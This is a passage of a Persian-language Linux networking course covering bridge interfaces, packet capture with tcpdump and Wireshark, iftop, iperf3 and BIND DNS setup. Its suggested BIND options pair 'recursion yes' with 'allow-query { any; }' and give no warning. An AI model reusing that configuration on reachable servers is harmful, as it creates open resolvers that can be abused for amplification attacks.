• در لینوکس، از bridge-utils برای ایجاد و مدیریت Network Bridge استفاده می‌شود.
• در ویندوز، از GUI یا PowerShell برای ایجاد Bridge میان کارت‌های شبکه استفاده می‌شود.
• ماشین‌های مجازی در KVM، VirtualBox و VMware می‌توانند از Bridge برای ارتباط مستقیم با شبکه فیزیکی استفاده کنند.
• پس از پیکربندی، تست اتصال و دریافت IP از DHCP برای بررسی صحت عملکرد Bridge ضروری است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”پیکربندی Bridge Interface در لینوکس” subtitle=”توضیحات کامل”]Bridge Interface یک پل شبکه‌ای مجازی است که برای اتصال چندین کارت شبکه به یکدیگر استفاده می‌شود. این قابلیت در سرورها و محیط‌های مجازی‌سازی بسیار مفید است و به ماشین‌های مجازی یا کانتینرها اجازه می‌دهد که به‌صورت مستقیم به شبکه فیزیکی متصل شوند.

---

۱. مزایای استفاده از Bridge Interface

• امکان اتصال چندین کارت شبکه به هم و ایجاد یک شبکه مشترک
• مدیریت ساده‌تر ارتباط بین ماشین‌های مجازی و شبکه فیزیکی
• کاهش وابستگی به NAT و افزایش سرعت ارتباطی
• استفاده در محیط‌های Docker، KVM، Xen و LXC برای ایجاد شبکه‌های مجازی بهینه

---

۲. نصب ابزارهای مورد نیاز

برای مدیریت Bridge، ابزار bridge-utils مورد نیاز است. برای نصب آن:

در Debian/Ubuntu:

apt update && apt install -y bridge-utils net-tools

در RHEL/CentOS:

yum install -y bridge-utils

---

۳. ایجاد و پیکربندی Bridge Interface در لینوکس

۳.۱ ایجاد یک Bridge به نام br0 (روش موقت – تا ری‌استارت بعدی)

ip link add name br0 type bridge
ip link set br0 up

افزودن کارت شبکه فیزیکی (مثلاً eth0) به Bridge:

ip link set eth0 master br0

بررسی وضعیت Bridge:

ip addr show br0

نکته: این تنظیمات پس از ری‌استارت سیستم از بین می‌رود. برای دائمی کردن تنظیمات، باید فایل‌های پیکربندی را تغییر دهیم.

---

۴. پیکربندی دائمی Bridge Interface در Debian/Ubuntu

۴.۱ تنظیمات در /etc/network/interfaces

ویرایش فایل:

nano /etc/network/interfaces

افزودن تنظیمات:

auto br0
iface br0 inet static
    address 192.168.1.100
    netmask 255.255.255.0
    gateway 192.168.1.1
    dns-nameservers 8.8.8.8 8.8.4.4
    bridge_ports eth0

اعمال تغییرات:

systemctl restart networking

---

۵. پیکربندی دائمی Bridge Interface در RHEL/CentOS

۵.۱ ایجاد فایل پیکربندی Bridge

ویرایش یا ایجاد فایل /etc/sysconfig/network-scripts/ifcfg-br0:

nano /etc/sysconfig/network-scripts/ifcfg-br0

افزودن تنظیمات:

DEVICE=br0
TYPE=Bridge
BOOTPROTO=static
IPADDR=192.168.1.100
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
DNS1=8.8.8.8
ONBOOT=yes

۵.۲ ویرایش فایل کارت شبکه فیزیکی و اتصال آن به Bridge

ویرایش فایل /etc/sysconfig/network-scripts/ifcfg-eth0:

nano /etc/sysconfig/network-scripts/ifcfg-eth0

تغییرات زیر را اعمال کنید:

DEVICE=eth0
ONBOOT=yes
BRIDGE=br0

اعمال تغییرات و ری‌استارت سرویس شبکه:

systemctl restart network

---

۶. ایجاد و مدیریت Bridge Interface با nmcli (در RHEL/CentOS 7 و جدیدتر)

ایجاد یک Bridge جدید:

nmcli connection add type bridge con-name br0 ifname br0

افزودن کارت شبکه eth0 به Bridge:

nmcli connection add type bridge-slave con-name br0-slave ifname eth0 master br0

تنظیم IP برای Bridge:

nmcli connection modify br0 ipv4.addresses 192.168.1.100/24
nmcli connection modify br0 ipv4.gateway 192.168.1.1
nmcli connection modify br0 ipv4.dns "8.8.8.8,8.8.4.4"
nmcli connection modify br0 ipv4.method manual

فعال‌سازی تنظیمات:

nmcli connection up br0

---

۷. تست عملکرد Bridge Interface

۷.۱ بررسی وضعیت Bridge

brctl show

۷.۲ بررسی آدرس IP اختصاص‌یافته

ip addr show br0

۷.۳ تست ارتباط با شبکه

ping -c 4 8.8.8.8

---

جمع‌بندی

• Bridge Interface به عنوان یک سوییچ مجازی در لینوکس عمل می‌کند و امکان اتصال چندین کارت شبکه را فراهم می‌آورد.
• در Debian/Ubuntu، پیکربندی دائمی Bridge در /etc/network/interfaces انجام می‌شود.
• در RHEL/CentOS، تنظیمات در /etc/sysconfig/network-scripts/ ذخیره می‌شود یا با nmcli مدیریت می‌شود.
• برای تست Bridge، از دستورات brctl show، ip addr show br0 و ping استفاده می‌شود.

[/cdb_course_lesson][cdb_course_lesson title=”فصل 2. مانیتورینگ و عیب‌یابی شبکه”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”ابزار tcpdump و بررسی بسته‌های شبکه” subtitle=”توضیحات کامل”]tcpdump یکی از ابزارهای قدرتمند لایه شبکه در سیستم‌عامل‌های یونیکس و لینوکس است که برای آنالیز و بررسی بسته‌های عبوری از کارت شبکه استفاده می‌شود. این ابزار به مدیران شبکه و متخصصان امنیت کمک می‌کند تا ترافیک شبکه را مشاهده و تحلیل کنند.

---

۱. نصب tcpdump

۱.۱ نصب در Debian/Ubuntu

apt update && apt install -y tcpdump

۱.۲ نصب در RHEL/CentOS

yum install -y tcpdump

۱.۳ بررسی نسخه نصب شده

tcpdump --version

---

۲. استفاده از tcpdump برای مشاهده بسته‌های شبکه

۲.۱ مشاهده ترافیک شبکه در رابط (interface) مشخص

tcpdump -i eth0

این دستور بسته‌های عبوری از کارت شبکه eth0 را به‌صورت زنده نمایش می‌دهد.

۲.۲ مشاهده بسته‌ها با نمایش جزئیات بیشتر

tcpdump -i eth0 -v

گزینه -v سطح جزئیات را افزایش می‌دهد و اطلاعات بیشتری درباره هر بسته نشان می‌دهد.

۲.۳ مشاهده بسته‌ها با نمایش هدر و محتوا

tcpdump -i eth0 -X

این دستور علاوه بر هدر، محتوای بسته‌ها را به‌صورت هگزادسیمال و اسکی نمایش می‌دهد.

۲.۴ نمایش تعداد مشخصی از بسته‌ها (مثلاً ۱۰ بسته)

tcpdump -i eth0 -c 10

این دستور پس از دریافت ۱۰ بسته متوقف می‌شود.

---

۳. فیلتر کردن بسته‌ها در tcpdump

۳.۱ فیلتر بر اساس آدرس IP مبدا یا مقصد

مشاهده بسته‌های مربوط به یک آدرس IP مشخص:

tcpdump -i eth0 host 192.168.1.100

مشاهده بسته‌هایی که از یک IP خاص ارسال شده‌اند:

tcpdump -i eth0 src host 192.168.1.100

مشاهده بسته‌هایی که به یک IP خاص ارسال شده‌اند:

tcpdump -i eth0 dst host 192.168.1.200

۳.۲ فیلتر بر اساس پروتکل‌های خاص (TCP, UDP, ICMP)

مشاهده فقط بسته‌های TCP:

tcpdump -i eth0 tcp

مشاهده فقط بسته‌های UDP:

tcpdump -i eth0 udp

مشاهده فقط بسته‌های ICMP (پینگ):

tcpdump -i eth0 icmp

۳.۳ فیلتر بر اساس شماره پورت

مشاهده بسته‌های مربوط به پورت ۸۰ (HTTP):

tcpdump -i eth0 port 80

مشاهده بسته‌هایی که از پورت ۲۲ (SSH) ارسال شده‌اند:

tcpdump -i eth0 src port 22

مشاهده بسته‌هایی که به پورت ۴۴۳ (HTTPS) ارسال شده‌اند:

tcpdump -i eth0 dst port 443

۳.۴ فیلتر کردن بسته‌ها بر اساس آدرس MAC

مشاهده بسته‌های مربوط به یک آدرس MAC خاص:

tcpdump -i eth0 ether host aa:bb:cc:dd:ee:ff

---

۴. ذخیره‌سازی و خواندن نتایج در tcpdump

۴.۱ ذخیره ترافیک شبکه در یک فایل برای تحلیل بعدی

tcpdump -i eth0 -w /var/log/network_traffic.pcap

این دستور بسته‌های شبکه را در فایل /var/log/network_traffic.pcap ذخیره می‌کند.

۴.۲ مشاهده محتوای فایل ضبط‌شده

tcpdump -r /var/log/network_traffic.pcap

با این دستور، می‌توان محتوای فایل ذخیره‌شده را مشاهده کرد.

۴.۳ فیلتر کردن بسته‌ها هنگام خواندن فایل

tcpdump -r /var/log/network_traffic.pcap port 443

فقط بسته‌های مرتبط با پورت ۴۴۳ را از فایل ذخیره‌شده نمایش می‌دهد.

---

۵. ترکیب فیلترها برای جستجوی دقیق‌تر

۵.۱ نمایش بسته‌های TCP که از 192.168.1.100 به 192.168.1.200 ارسال شده‌اند و از پورت 80 استفاده می‌کنند

tcpdump -i eth0 src host 192.168.1.100 and dst host 192.168.1.200 and tcp and port 80

۵.۲ نمایش بسته‌های UDP روی پورت 53 (DNS) که از 192.168.1.50 دریافت شده‌اند

tcpdump -i eth0 src host 192.168.1.50 and udp and port 53

---

۶. تحلیل بسته‌های ذخیره‌شده با Wireshark

اگر نیاز به تحلیل بصری بیشتری داشته باشید، می‌توان فایل ذخیره‌شده را با ابزار Wireshark بررسی کرد. برای این کار:

در سیستم لینوکس یا ویندوز:
۱. Wireshark را باز کنید.
۲. از منوی File گزینه Open را انتخاب کنید.
3. فایل network_traffic.pcap را انتخاب کنید.
۴. بسته‌های شبکه را بررسی و تحلیل کنید.

---

جمع‌بندی

• tcpdump یکی از مهم‌ترین ابزارهای بررسی بسته‌های شبکه در لینوکس است.
• امکان مانیتورینگ زنده بسته‌های شبکه و ذخیره‌سازی برای تحلیل بعدی را فراهم می‌کند.
• می‌توان بسته‌ها را بر اساس IP، پورت، پروتکل و آدرس MAC فیلتر کرد.
• نتایج را می‌توان در قالب فایل PCAP ذخیره و با Wireshark بررسی کرد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”ابزار Wireshark و تجزیه و تحلیل بسته‌های شبکه” subtitle=”توضیحات کامل”]Wireshark یکی از قدرتمندترین ابزارهای مانیتورینگ و تحلیل بسته‌های شبکه است که به متخصصان شبکه و امنیت امکان بررسی دقیق ترافیک شبکه را می‌دهد. این ابزار رابط گرافیکی پیشرفته‌ای دارد و می‌تواند پروتکل‌های مختلف را رمزگشایی و بررسی کند.

---

۱. نصب Wireshark

۱.۱ نصب در Debian/Ubuntu

apt update && apt install -y wireshark

۱.۲ نصب در RHEL/CentOS

yum install -y wireshark

۱.۳ نصب در Windows

۱. آخرین نسخه Wireshark را از سایت رسمی دانلود کنید.
۲. نصب را اجرا کرده و گزینه Npcap را برای مانیتورینگ شبکه انتخاب کنید.
۳. پس از نصب، سیستم را ری‌استارت کنید.

۱.۴ بررسی نسخه نصب شده

wireshark --version

---

۲. ضبط و مشاهده ترافیک زنده در Wireshark

۲.۱ اجرای Wireshark در لینوکس (رابط گرافیکی)

wireshark &

۲.۲ مشاهده لیست رابط‌های شبکه و انتخاب یک رابط برای ضبط بسته‌ها

tshark -D

مثال خروجی:

1. eth0
2. wlan0
3. lo

۲.۳ ضبط ترافیک روی کارت شبکه eth0

wireshark -i eth0

یا با tshark در محیط ترمینال:

tshark -i eth0

۲.۴ توقف ضبط بسته‌ها

در رابط گرافیکی، روی دکمه Stop کلیک کنید.
در ترمینال، CTRL + C را بزنید.

---

۳. فیلتر کردن بسته‌ها در Wireshark

۳.۱ فیلتر بر اساس IP مبدا یا مقصد

در فیلد Filter عبارت‌های زیر را وارد کنید:

• نمایش بسته‌های مربوط به IP خاص:

  ip.addr == 192.168.1.100
  

• نمایش بسته‌هایی که از یک IP خاص ارسال شده‌اند:

  ip.src == 192.168.1.100
  

• نمایش بسته‌هایی که به یک IP خاص ارسال شده‌اند:

  ip.dst == 192.168.1.200
  

۳.۲ فیلتر بر اساس پروتکل‌ها

• نمایش فقط بسته‌های TCP:

  tcp
  

• نمایش فقط بسته‌های UDP:

  udp
  

• نمایش فقط بسته‌های ICMP (پینگ):

  icmp
  

۳.۳ فیلتر بر اساس شماره پورت

• نمایش بسته‌های مربوط به پورت ۸۰ (HTTP):

  tcp.port == 80
  

• نمایش بسته‌هایی که از پورت ۲۲ (SSH) ارسال شده‌اند:

  tcp.srcport == 22
  

• نمایش بسته‌هایی که به پورت ۴۴۳ (HTTPS) ارسال شده‌اند:

  tcp.dstport == 443
  

۳.۴ فیلتر کردن بسته‌های DNS

dns

۳.۵ ترکیب فیلترها

مثال: نمایش بسته‌های TCP که از 192.168.1.100 به 192.168.1.200 ارسال شده‌اند و از پورت 80 استفاده می‌کنند:

ip.src == 192.168.1.100 && ip.dst == 192.168.1.200 && tcp.port == 80

---

۴. ذخیره و تحلیل بسته‌ها در Wireshark

۴.۱ ذخیره ترافیک شبکه در فایل

در رابط گرافیکی، از File → Save As فایل را در فرمت .pcap ذخیره کنید.
در ترمینال، از tshark استفاده کنید:

tshark -i eth0 -w /var/log/capture.pcap

۴.۲ باز کردن فایل ضبط‌شده در Wireshark

در Wireshark، از File → Open فایل capture.pcap را انتخاب کنید.
یا در ترمینال:

wireshark /var/log/capture.pcap

۴.۳ فیلتر کردن بسته‌های ذخیره‌شده

tcp.port == 443 && ip.addr == 192.168.1.100

---

۵. بررسی مشکلات شبکه با Wireshark

۵.۱ بررسی مشکل کندی اتصال (Latency Analysis)

۱. در تب Statistics گزینه TCP Stream Graphs → Round Trip Time را باز کنید.
۲. اگر مقدار RTT بالا باشد، احتمال وجود مشکل در شبکه وجود دارد.

۵.۲ بررسی قطع شدن ارتباط TCP (Packet Loss)

۱. از Statistics → TCP Stream Graphs → Time-Sequence Graph استفاده کنید.
۲. اگر TCP Retransmission زیاد باشد، ممکن است مشکل در اتصال یا مسیر ارتباطی وجود داشته باشد.
۳. برای بررسی دقیق‌تر، فیلتر زیر را در Wireshark اعمال کنید:

tcp.analysis.retransmission

۵.۳ بررسی حملات ARP Spoofing

۱. در Filter عبارت زیر را جستجو کنید:

arp.duplicate-address-detected

۲. اگر چندین بسته ARP با آدرس مشابه ولی MAC متفاوت مشاهده کردید، ممکن است حمله ARP در جریان باشد.

۵.۴ بررسی ترافیک غیرمجاز (Unauthorized Traffic)

۱. بررسی ارتباطات مشکوک به سرورهای خارجی:

ip.dst != 192.168.1.0/24

۲. بررسی تلاش برای ورود ناموفق (Authentication Failure):

kerberos && ip.src == 192.168.1.200

۳. بررسی پورت‌های باز مشکوک:

tcp.flags.syn == 1 && tcp.flags.ack == 0

---

۶. استفاده از tshark برای تحلیل بسته‌ها از طریق CLI

۶.۱ مشاهده ۱۰ بسته اول

tshark -i eth0 -c 10

۶.۲ نمایش بسته‌های خاص (مثلاً HTTP)

tshark -i eth0 -Y "http"

۶.۳ استخراج نام دامنه‌های درخواست‌شده از طریق DNS

tshark -i eth0 -Y "dns" -T fields -e dns.qry.name

۶.۴ ذخیره خروجی در فایل متنی

tshark -i eth0 -Y "http" > /var/log/http_requests.txt

---

جمع‌بندی

• Wireshark یک ابزار گرافیکی قدرتمند برای تجزیه و تحلیل بسته‌های شبکه است.
• می‌توان بسته‌ها را بر اساس IP، پورت، پروتکل و آدرس MAC فیلتر کرد.
• از Wireshark می‌توان برای بررسی مشکلات شبکه‌ای، تشخیص حملات و تحلیل عملکرد شبکه استفاده کرد.
• tshark نسخه خط فرمان Wireshark است که امکان تحلیل بسته‌ها بدون رابط گرافیکی را فراهم می‌کند.
• فایل‌های ضبط‌شده در Wireshark می‌توانند با ابزارهای دیگر مانند tcpdump نیز بررسی شوند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مانیتورینگ پهنای باند شبکه با iftop” subtitle=”توضیحات کامل”]iftop یک ابزار مانیتورینگ لحظه‌ای پهنای باند شبکه است که برای بررسی میزان مصرف ترافیک ورودی و خروجی به تفکیک آدرس‌های IP مورد استفاده قرار می‌گیرد. این ابزار مخصوص محیط‌های لینوکسی و یونیکسی بوده و به‌عنوان جایگزینی برای top در زمینه تحلیل ترافیک شبکه به کار می‌رود.

---

۱. نصب iftop

۱.۱ نصب در Debian/Ubuntu

apt update && apt install -y iftop

۱.۲ نصب در RHEL/CentOS

yum install -y iftop

۱.۳ نصب در Arch Linux

pacman -S iftop

۱.۴ بررسی نسخه نصب شده

iftop -h

---

۲. اجرای iftop و نمایش اطلاعات شبکه

۲.۱ اجرای ساده iftop روی یک اینترفیس خاص (مثلاً eth0)

iftop -i eth0

بعد از اجرای دستور، نمایی مشابه زیر نمایش داده می‌شود:

             192.168.1.10        =>        192.168.1.1          1.2Mb  1.1Mb  1.0Mb
             192.168.1.10        <=        192.168.1.1          512Kb  480Kb  500Kb

اعداد نشان‌دهنده میزان ارسال و دریافت داده در بازه‌های زمانی 2، 10 و 40 ثانیه هستند.

۲.۲ مشاهده تمام اینترفیس‌های شبکه و انتخاب اینترفیس مناسب

iftop -h | grep "interface"

یا

ip link show

۲.۳ اجرای iftop بدون حل کردن نام دامنه‌ها (برای افزایش سرعت نمایش)

iftop -n -i eth0

۲.۴ نمایش فقط بسته‌های ارسال شده از سرور

iftop -i eth0 -F 192.168.1.10

۲.۵ نمایش ترافیک مربوط به یک ساب‌نت خاص (مثلاً 192.168.1.0/24)

iftop -i eth0 -f "net 192.168.1.0/24"

۲.۶ نمایش مصرف ترافیک به تفکیک پورت‌ها

iftop -P -i eth0

این گزینه پورت‌های مبدا و مقصد را برای هر ارتباط نمایش می‌دهد.

۲.۷ نمایش فقط ترافیک دریافت شده (Inbound)

iftop -i eth0 -o in

۲.۸ نمایش فقط ترافیک ارسال شده (Outbound)

iftop -i eth0 -o out

---

۳. فیلتر کردن نتایج iftop برای تشخیص منابع ترافیک بالا

۳.۱ نمایش ارتباطات مربوط به یک آدرس IP خاص

iftop -i eth0 -f "host 192.168.1.10"

۳.۲ نمایش فقط ارتباطات HTTP (پورت 80 و 443)

iftop -i eth0 -f "port 80 or port 443"

۳.۳ نمایش ترافیک بین دو آدرس خاص

iftop -i eth0 -f "host 192.168.1.10 and host 192.168.1.20"

۳.۴ ذخیره لاگ‌های iftop در فایل متنی

iftop -i eth0 > /var/log/iftop_log.txt

این دستور اطلاعات iftop را در مسیر /var/log/iftop_log.txt ذخیره می‌کند.

---

۴. بررسی نتایج و شناسایی منابع مصرف بالای پهنای باند

۴.۱ شناسایی دستگاه‌هایی که بیشترین ترافیک را ایجاد کرده‌اند

در نمای گرافیکی iftop، آدرس‌های IP با بیشترین ترافیک در صدر لیست نمایش داده می‌شوند.

۴.۲ بررسی ترافیک بر اساس پروتکل‌ها

اگر مشاهده شود که بیشترین ترافیک روی پورت‌های ۸۰ و ۴۴۳ است، این نشان‌دهنده ترافیک وب (HTTP/HTTPS) است.
اما اگر ترافیک بالا روی پورت‌های ۲۲، ۲۳ یا ۳۳۸۹ باشد، ممکن است ارتباطات SSH، Telnet یا Remote Desktop دلیل مصرف بالای پهنای باند باشند.

۴.۳ بررسی ارتباطات غیرمجاز و حملات شبکه‌ای

با استفاده از iftop -n می‌توان آدرس‌های IP مشکوک را شناسایی کرده و بررسی کرد که آیا ترافیک نامتعارفی از سرور دریافت می‌شود یا خیر.

---

۵. ترکیب iftop با دیگر ابزارهای مانیتورینگ شبکه

۵.۱ اجرای همزمان iftop و tcpdump برای بررسی جزئیات بیشتر

iftop -i eth0 -n & tcpdump -i eth0 -w /var/log/tcpdump.pcap

فایل tcpdump.pcap را می‌توان بعداً با Wireshark تحلیل کرد.

۵.۲ ترکیب iftop با nload برای نمایش مصرف کلی پهنای باند

iftop -i eth0 & nload eth0

ابزار nload مقدار کلی مصرف پهنای باند را در قالب نمودار گرافیکی نمایش می‌دهد.

۵.۳ ترکیب با vnstat برای ذخیره و بررسی مصرف روزانه پهنای باند

vnstat -i eth0

این دستور آمار کلی ترافیک شبکه در بازه‌های زمانی مختلف را نشان می‌دهد.

---

۶. توقف اجرای iftop

۶.۱ خروج از محیط iftop

برای خروج از iftop کلید q را فشار دهید.

۶.۲ بستن iftop از طریق ترمینال

killall iftop

یا

pkill iftop

---

جمع‌بندی

• iftop ابزاری سبک و سریع برای مانیتورینگ لحظه‌ای ترافیک شبکه است.
• می‌توان میزان مصرف پهنای باند را به تفکیک IP، پورت و پروتکل مشاهده کرد.
• فیلترهای مختلف به شناسایی ترافیک غیرمجاز و مصرف غیرطبیعی پهنای باند کمک می‌کنند.
• ترکیب iftop با ابزارهایی مانند tcpdump، vnstat و nload می‌تواند تحلیل دقیق‌تری از وضعیت شبکه ارائه دهد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”بررسی پهنای باند و عملکرد شبکه با استفاده از iperf” subtitle=”توضیحات کامل”]iperf یکی از قدرتمندترین ابزارهای تست پهنای باند و ارزیابی عملکرد شبکه است که به کاربران اجازه می‌دهد سرعت و کیفیت ارتباطات TCP و UDP را بررسی کنند. این ابزار می‌تواند در محیط‌های محلی (LAN) و گسترده (WAN) برای تحلیل تأخیر، جیتر (Jitter)، از دست رفتن بسته‌ها (Packet Loss) و محدودیت‌های پهنای باند استفاده شود.

---

۱. نصب iperf

۱.۱ نصب iperf در Debian/Ubuntu

apt update && apt install -y iperf3

۱.۲ نصب iperf در RHEL/CentOS

yum install -y iperf3

۱.۳ نصب iperf در Arch Linux

pacman -S iperf3

۱.۴ بررسی نسخه نصب شده

iperf3 --version

---

۲. نحوه عملکرد iperf

iperf از یک مدل کلاینت – سرور برای انجام تست‌های شبکه استفاده می‌کند.

• ابتدا یک سرور iperf اجرا می‌شود که به درخواست‌های تست پاسخ می‌دهد.
• سپس یک کلاینت iperf به سرور متصل شده و تست‌های شبکه را اجرا می‌کند.

---

۳. اجرای iperf در حالت سرور

۳.۱ راه‌اندازی iperf در سرور (پورت پیش‌فرض 5201)

iperf3 -s

خروجی نمونه:

-----------------------------------------------------------
Server listening on 5201
-----------------------------------------------------------

این سرور به تمام درخواست‌های تست کلاینت گوش می‌دهد.

۳.۲ اجرای iperf روی یک پورت خاص (مثلاً 5000)

iperf3 -s -p 5000

۳.۳ اجرای iperf در حالت پس‌زمینه (daemon mode)

iperf3 -s -D

این گزینه سرور را در پس‌زمینه اجرا می‌کند تا در هر لحظه بتوان کلاینت‌ها را تست کرد.

---

۴. اجرای iperf در حالت کلاینت

۴.۱ اجرای تست TCP بین کلاینت و سرور

iperf3 -c 192.168.1.1

در این دستور، سرور روی آدرس 192.168.1.1 اجرا شده است و کلاینت تلاش می‌کند تا به آن متصل شود.

خروجی نمونه:

[  5]   0.00-10.00  sec  112 MBytes   94.3 Mbits/sec                  
[  5]  10.00-20.00  sec  118 MBytes   98.1 Mbits/sec                  
[  5]  20.00-30.00  sec  120 MBytes  100.5 Mbits/sec                  

این نتایج نشان‌دهنده پهنای باند TCP بین دو دستگاه است.

۴.۲ اجرای تست TCP روی یک پورت خاص (مثلاً 5000)

iperf3 -c 192.168.1.1 -p 5000

۴.۳ اجرای تست در جهت معکوس (Reverse Mode – دریافت داده از سرور به کلاینت)

iperf3 -c 192.168.1.1 -R

در این حالت، به‌جای ارسال داده، کلاینت داده را از سرور دریافت می‌کند تا پهنای باند دانلود تست شود.

---

۵. تست عملکرد شبکه با پروتکل UDP

۵.۱ اجرای تست UDP برای بررسی میزان جیتر و از دست رفتن بسته‌ها

iperf3 -c 192.168.1.1 -u

در این تست مقدار جیتر (Jitter) و Packet Loss نیز نمایش داده می‌شود که برای ارزیابی کیفیت ارتباط VoIP و استریم ویدیو مهم است.

۵.۲ تنظیم نرخ ارسال داده در UDP (مثلاً 10 مگابیت بر ثانیه)

iperf3 -c 192.168.1.1 -u -b 10M

گزینه -b مقدار پهنای باند را برای تست UDP مشخص می‌کند.

۵.۳ بررسی تأخیر بسته‌ها در UDP

iperf3 -c 192.168.1.1 -u --get-server-output

در این تست، جیتر و تأخیر در دریافت داده‌ها تحلیل می‌شود.

---

۶. تست‌های پیشرفته با iperf

۶.۱ تست با تعداد اتصالات موازی (Threads) برای شبیه‌سازی بار سنگین

iperf3 -c 192.168.1.1 -P 5

گزینه -P تعداد اتصالات همزمان را مشخص می‌کند تا بررسی شود که آیا سرور می‌تواند همزمان چندین ارتباط را مدیریت کند یا خیر.

۶.۲ اجرای تست برای مدت زمان طولانی‌تر (مثلاً 60 ثانیه)

iperf3 -c 192.168.1.1 -t 60

گزینه -t مدت زمان تست را مشخص می‌کند.

۶.۳ اجرای تست در حالت full-duplex (همزمان ارسال و دریافت داده)

iperf3 -c 192.168.1.1 --bidir

این تست برای شبیه‌سازی ارتباطات دوطرفه واقعی کاربرد دارد.

۶.۴ ذخیره نتایج تست iperf در یک فایل متنی

iperf3 -c 192.168.1.1 > /var/log/iperf_results.txt

فایل /var/log/iperf_results.txt بعداً برای تحلیل بیشتر قابل بررسی است.

---

۷. تحلیل نتایج تست‌های شبکه

۷.۱ بررسی مقدار پهنای باند (Bandwidth)

• مقدار Mbits/sec نشان‌دهنده سرعت واقعی انتقال داده‌ها است.
• اگر مقدار کمتر از انتظار باشد، مشکلات شبکه‌ای، تداخل، یا محدودیت‌های پهنای باند وجود دارد.

۷.۲ بررسی جیتر (Jitter) در تست‌های UDP

• مقدار جیتر هرچه کمتر باشد، ارتباط پایدارتر است.
• جیتر بالا می‌تواند باعث اختلال در تماس‌های VoIP و پخش زنده ویدیو شود.

۷.۳ بررسی از دست رفتن بسته‌ها (Packet Loss)

• مقدار Packet Loss باید نزدیک ۰٪ باشد.
• مقدار زیاد نشان‌دهنده مشکل در کیفیت لینک، نویز یا ازدحام شبکه است.

---

۸. توقف و مدیریت iperf

۸.۱ بستن سرور iperf

killall iperf3

یا

pkill iperf3

۸.۲ متوقف کردن اجرای پس‌زمینه iperf

kill $(pgrep -f "iperf3 -s -D")

---

جمع‌بندی

• iperf3 یکی از بهترین ابزارهای تست عملکرد شبکه است که قابلیت بررسی سرعت، تأخیر و کیفیت ارتباطات TCP و UDP را دارد.
• با اجرای سرور و کلاینت در دو سیستم مختلف، می‌توان کیفیت ارتباطات بین دو نقطه را سنجید.
• می‌توان تست‌های مختلفی مانند multi-threading، reverse mode و bidirectional mode را اجرا کرد.
• نتایج شامل پهنای باند، جیتر و Packet Loss می‌شود که در تحلیل مشکلات شبکه و بهینه‌سازی آن بسیار مفید است.

[/cdb_course_lesson][cdb_course_lesson title=”فصل 3. سرویس‌های شبکه‌ای”][/cdb_course_lesson][cdb_course_lesson title=”راه‌اندازی و پیکربندی BIND (DNS)”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نصب و پیکربندی BIND برای ایجاد سرور DNS” subtitle=”توضیحات کامل”]BIND (Berkeley Internet Name Domain) یکی از محبوب‌ترین و پرکاربردترین نرم‌افزارهای سرور DNS در لینوکس و یونیکس است که امکان راه‌اندازی DNS سرور محلی و عمومی را فراهم می‌کند. این ابزار به‌صورت کاشه (Caching DNS)، سرور محلی (Authoritative DNS) و فورواردینگ (Forwarding DNS) قابل پیکربندی است.

---

۱. نصب BIND

۱.۱ نصب BIND در Debian/Ubuntu

apt update && apt install -y bind9 bind9utils bind9-doc

۱.۲ نصب BIND در RHEL/CentOS

yum install -y bind bind-utils

۱.۳ نصب BIND در Arch Linux

pacman -S bind

۱.۴ بررسی نسخه نصب‌شده

named -v

---

۲. تنظیمات اولیه BIND

۲.۱ فعال‌سازی سرویس BIND و اطمینان از اجرای آن

systemctl enable --now named
systemctl status named

اگر در توزیع Debian/Ubuntu هستید:

systemctl enable --now bind9
systemctl status bind9

---

۳. پیکربندی BIND به‌عنوان یک سرور DNS لوکال

فایل اصلی تنظیمات BIND در مسیر زیر قرار دارد:

/etc/bind/named.conf

یا در RHEL/CentOS

/etc/named.conf

۳.۱ تنظیمات اولیه در فایل named.conf

مسیر فایل: /etc/bind/named.conf.options (در Debian/Ubuntu)
مسیر فایل: /etc/named.conf (در RHEL/CentOS)

nano /etc/bind/named.conf.options

محتوای پیشنهادی برای یک سرور DNS لوکال:

options {
    directory "/var/cache/bind";
    recursion yes;
    allow-query { any; };
    forwarders {
        8.8.8.8;
        8.8.4.4;
    };
    dnssec-validation auto;
};

توضیحات:

• recursion yes; → امکان پردازش درخواست‌های بازگشتی را فراهم می‌کند.
• allow-query { any; }; → اجازه درخواست از همه کلاینت‌ها را می‌دهد.
• forwarders → سرورهای گوگل DNS به‌عنوان فوروارد استفاده می‌شوند.

---

۴. پیکربندی BIND به‌عنوان یک سرور DNS محلی

۴.۱ افزودن منطقه (Zone) به فایل named.conf.local

مسیر فایل: /etc/bind/named.conf.local

nano /etc/bind/named.conf.local

افزودن منطقه برای دامنه محلی (مثلاً example.com):

zone "example.com" {
    type master;
    file "/etc/bind/db.example.com";
};

۴.۲ ایجاد فایل منطقه (Zone File)

مسیر فایل: /etc/bind/db.example.com

nano /etc/bind/db.example.com

محتوای نمونه فایل منطقه:

$TTL 86400
@   IN  SOA example.com. admin.example.com. (
        2024030101  ; Serial
        3600        ; Refresh
        1800        ; Retry
        604800      ; Expire
        86400 )     ; Minimum TTL

@       IN  NS  ns1.example.com.
ns1     IN  A   192.168.1.1
www     IN  A   192.168.1.2

توضیحات:

• @ IN SOA example.com. admin.example.com. → مشخص کردن نام دامنه و ایمیل مدیریت.
• ns1 IN A 192.168.1.1 → تنظیم سرور نام (NS).
• www IN A 192.168.1.2 → تنظیم رکورد برای www.example.com.

۴.۳ تنظیم سطح دسترسی فایل منطقه

chown bind:bind /etc/bind/db.example.com
chmod 644 /etc/bind/db.example.com

---

۵. بررسی و اعمال تنظیمات

۵.۱ بررسی صحت پیکربندی

named-checkconf
named-checkzone example.com /etc/bind/db.example.com

۵.۲ راه‌اندازی مجدد BIND

systemctl restart bind9

یا

systemctl restart named

---

۶. تنظیمات کلاینت برای استفاده از DNS سرور BIND

۶.۱ ویرایش فایل resolv.conf در کلاینت‌ها

مسیر فایل: /etc/resolv.conf

nano /etc/resolv.conf

افزودن سرور DNS محلی:

nameserver 192.168.1.1

۶.۲ تست عملکرد DNS سرور

nslookup example.com 192.168.1.1

یا

dig example.com @192.168.1.1

---

